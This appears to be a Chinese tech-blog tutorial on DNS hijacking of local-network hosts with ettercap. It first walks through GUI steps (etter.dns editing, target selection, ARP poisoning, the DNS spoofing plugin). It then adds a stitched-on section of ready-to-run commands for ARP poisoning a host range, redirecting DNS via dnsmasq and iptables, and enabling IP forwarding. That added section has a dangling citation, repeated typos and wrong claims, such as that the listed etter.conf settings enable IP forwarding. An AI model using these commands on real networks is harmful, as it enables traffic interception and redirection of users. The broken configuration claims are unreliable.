使用ettercap进行dns劫持

使用ettercap对局域网主机进行dns劫持

1.vim /etc/ettercap/etter.dns 配置劫持的域名和重定向的IP
在这里插入图片描述
2.开启ettercap,并点hosts->scan for hosts扫描局域网ip
在这里插入图片描述
3.网关加到target1,目标机加到target2
在这里插入图片描述
4.点击圆形图标,开启arp劫持在这里插入图片描述
5.点击plugins,双击dns劫持。
在这里插入图片描述
5.可以看到劫持后目标机访问sina.com成功被重定向到了127.0.0.1
在这里插入图片描述

### DNS 劫持攻击的复现步骤 在渗透测试或网络安全研究中,DNS 劢持是一种常见的中间人攻击形式。通过此类攻击,攻击者可以将目标主机的 DNS 请求重定向到恶意服务器,从而实现对特定域名解析结果的篡改。使用 `ettercap` 可以完成此类攻击的复现,而 `aptitude` 则可用于安装和管理相关依赖包。 为确保系统环境具备完整的工具链支持,应先使用 `aptitude` 安装 `ettercap` 和其他必要的网络分析工具: ```bash sudo aptitude install ettercap-text-only dnsutils ``` 该命令将安装基于文本界面的 `ettercap` 版本以及用于测试 DNS 解析的 `dnsutils` 工具集[^1]。 配置攻击环境时,需准备一个本地 DNS 服务器(如 `dnsmasq`)并设置自定义的解析规则。编辑 `/etc/dnsmasq.conf` 文件,添加以下内容以拦截特定域名的 DNS 请求: ``` address=/example.com/192.168.1.100 ``` 此配置会将所有对 `example.com` 的解析请求指向指定 IP 地址(如攻击者的 Web 服务器)。启动 `dnsmasq` 服务后,确认其正常运行并监听 53 端口: ```bash sudo systemctl start dnsmasq sudo systemctl enable dnsmasq ``` 随后,配置 `ettercap` 进行 ARP 缓存投毒,以便在网络中截获目标设备的流量。创建配置文件 `/etc/ettercap/etter.conf`,调整如下参数以允许 IP 转发和内核 IP 包转发: ``` ec_uid = 0 ec_gid = 0 promisc_mode = true ``` 启用内核级 IP 转发功能,确保中间人攻击过程中目标流量不会中断: ```bash echo 1 > /proc/sys/net/ipv4/ip_forward ``` 执行实际攻击时,运行以下命令启动 `ettercap` 并指定目标网段及攻击模式: ```bash sudo ettercap -T -M arp:remote /192.168.1.1/ /192.168.1.5-100/ ``` 上述命令将以文本模式(`-T`)启动,并对指定 IP 范围内的主机发起 ARP 投毒攻击,使其流量经过攻击者的机器。在此基础上,结合 `iptables` 规则将 DNS 流量重定向至本地 DNS 服务器: ```bash sudo iptables -t nat -A PREROUTING -p udp --dport 53 -j REDIRECT --to-ports 53 ``` 最终,在目标设备上尝试访问被劫持的域名,使用 `nslookup example.com` 或 `dig example.com` 命令验证是否返回攻击者设定的 IP 地址。若成功,则表明 DNS 劢持攻击已复现。 ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值